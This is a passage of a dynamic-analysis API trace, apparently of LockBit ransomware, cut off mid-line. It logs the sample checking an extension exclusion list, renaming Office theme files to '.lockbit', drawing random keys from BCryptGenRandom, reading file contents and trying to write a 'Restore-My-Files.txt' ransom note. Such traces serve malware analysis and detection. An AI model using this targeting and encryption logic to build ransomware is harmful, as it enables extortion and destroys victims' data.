dwReserved0=0x0, dwReserved1=0x0, cFileName="Civic.thmx", cAlternateFileName="CIVIC~1.THM")) returned 1 [0185.894] lstrcmpiW (lpString1=".", lpString2="Civic.thmx") returned -1 [0185.894] lstrcmpiW (lpString1="..", lpString2="Civic.thmx") returned -1 [0185.894] PathFindExtensionW (pszPath="Civic.thmx") returned=".thmx" [0185.894] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0185.894] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0185.895] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0185.895] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0185.896] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0185.896] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.896] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0185.896] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0185.896] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0185.896] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0185.896] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Civic.thmx") returned 1 [0185.896] lstrcmpiW (lpString1="ntldr", lpString2="Civic.thmx") returned 1 [0185.896] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Civic.thmx") returned 1 [0185.896] lstrcmpiW (lpString1="bootsect.bak", lpString2="Civic.thmx") returned -1 [0185.896] lstrcmpiW (lpString1="autorun.inf", lpString2="Civic.thmx") returned -1 [0185.896] lstrcmpiW (lpString1="thumbs.db", lpString2="Civic.thmx") returned 1 [0185.896] lstrcmpiW (lpString1="iconcache.db", lpString2="Civic.thmx") returned 1 [0185.896] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0185.896] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Civic.thmx") returned=".thmx" [0185.896] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0185.896] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0185.896] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0185.896] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0185.897] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0185.897] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Civic.thmx.lockbit") returned 72 [0185.897] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Civic.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\civic.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0185.905] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.905] malloc (_Size=0x40068) returned 0x3d70450 [0185.905] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=101393) returned 1 [0185.905] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.906] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0185.906] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.906] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0185.907] ReadFile (in: hFile=0x330, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0185.910] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Civic.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Civic.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.910] malloc (_Size=0xa6) returned 0x1fa2ed8 [0185.910] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0185.912] free (_Block=0x1fa2ed8) [0185.912] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Civic.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0185.912] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0185.912] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.912] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43fb4000, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59db6e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x43fb4000, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x105f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Clarity.thmx", cAlternateFileName="CLARIT~1.THM")) returned 1 [0185.912] lstrcmpiW (lpString1=".", lpString2="Clarity.thmx") returned -1 [0185.912] lstrcmpiW (lpString1="..", lpString2="Clarity.thmx") returned -1 [0185.912] PathFindExtensionW (pszPath="Clarity.thmx") returned=".thmx" [0185.912] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0185.912] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0185.913] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0185.914] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0185.914] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Clarity.thmx") returned 1 [0185.914] lstrcmpiW (lpString1="ntldr", lpString2="Clarity.thmx") returned 1 [0185.914] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Clarity.thmx") returned 1 [0185.914] lstrcmpiW (lpString1="bootsect.bak", lpString2="Clarity.thmx") returned -1 [0185.914] lstrcmpiW (lpString1="autorun.inf", lpString2="Clarity.thmx") returned -1 [0185.915] lstrcmpiW (lpString1="thumbs.db", lpString2="Clarity.thmx") returned 1 [0185.915] lstrcmpiW (lpString1="iconcache.db", lpString2="Clarity.thmx") returned 1 [0185.915] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0185.915] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Clarity.thmx") returned=".thmx" [0185.915] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0185.915] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0185.915] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0185.916] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0185.916] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0185.916] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0185.916] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0185.916] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0185.916] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0185.916] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0185.916] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0185.916] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Clarity.thmx.lockbit") returned 74 [0185.916] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Clarity.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\clarity.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0187.453] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0187.453] malloc (_Size=0x40068) returned 0x3df0008 [0187.453] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=67060) returned 1 [0187.453] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.454] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0187.454] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.454] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0187.454] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0187.456] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Clarity.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Clarity.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.456] malloc (_Size=0xaa) returned 0x1fa2ed8 [0187.456] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0187.458] free (_Block=0x1fa2ed8) [0187.458] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Clarity.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0187.458] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0187.458] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0187.458] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a20e000, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5a01840, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6a20e000, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x8ad4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Composite.thmx", cAlternateFileName="COMPOS~1.THM")) returned 1 [0187.458] lstrcmpiW (lpString1=".", lpString2="Composite.thmx") returned -1 [0187.458] lstrcmpiW (lpString1="..", lpString2="Composite.thmx") returned -1 [0187.458] PathFindExtensionW (pszPath="Composite.thmx") returned=".thmx" [0187.458] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0187.458] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0187.458] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0187.458] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0187.458] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0187.458] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0187.458] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0187.458] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0187.458] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0187.458] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0187.458] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0187.458] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0187.459] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0187.459] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Composite.thmx") returned 1 [0187.460] lstrcmpiW (lpString1="ntldr", lpString2="Composite.thmx") returned 1 [0187.460] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Composite.thmx") returned 1 [0187.460] lstrcmpiW (lpString1="bootsect.bak", lpString2="Composite.thmx") returned -1 [0187.460] lstrcmpiW (lpString1="autorun.inf", lpString2="Composite.thmx") returned -1 [0187.460] lstrcmpiW (lpString1="thumbs.db", lpString2="Composite.thmx") returned 1 [0187.460] lstrcmpiW (lpString1="iconcache.db", lpString2="Composite.thmx") returned 1 [0187.460] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0187.460] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Composite.thmx") returned=".thmx" [0187.460] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0187.460] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0187.460] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0187.461] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0187.461] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Composite.thmx.lockbit") returned 76 [0187.461] 